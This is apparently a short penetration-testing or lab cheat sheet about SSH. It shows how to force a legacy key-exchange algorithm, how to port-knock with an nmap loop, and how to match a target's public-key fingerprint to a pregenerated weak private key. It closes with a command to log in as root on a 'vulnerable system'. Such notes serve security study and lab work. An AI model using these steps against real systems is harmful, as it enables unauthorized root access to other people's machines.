no matching key exchange method found. Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
Solution:
ssh sunny@10.10.10.76 -p 22022 -oKexAlgorithms=+diffie-hellman-group1-sha1
#To SSH using DSA private key, add to etc/ssh/ssh_config)
PubkeyAcceptedKeyTypes +ssh-dss
Port Knock
for i in 571 5292 291;do nmap -Pn --host-timeout 201 --max-retries 0 -p $i <IP>; done
$ ssh-keygen -l -f targetkey.pub
2048 c6:7b:14:fa:ae:b6:89:e6:67:17:ee:04:17:b0:ec:4e targetkey.pub
If we look at the public key in an editor, we can also infer that the key type is RSA. In order to locate the private key for this public key, we need to extract the data files, and look for a file named:
rsa/2048/**c67b14faaeb689e66717ee0417b0ec4e-26670**
In the example above, the fingerprint is represented in hexadecimal with the colons removed, and the process ID is indicated as "26670". If we want to authenticate to a vulnerable system that uses this public key for authentication, we would run the following command:
$ ssh -i rsa/2048/c67b14faaeb689e66717ee0417b0ec4e-26670 root@targetmachine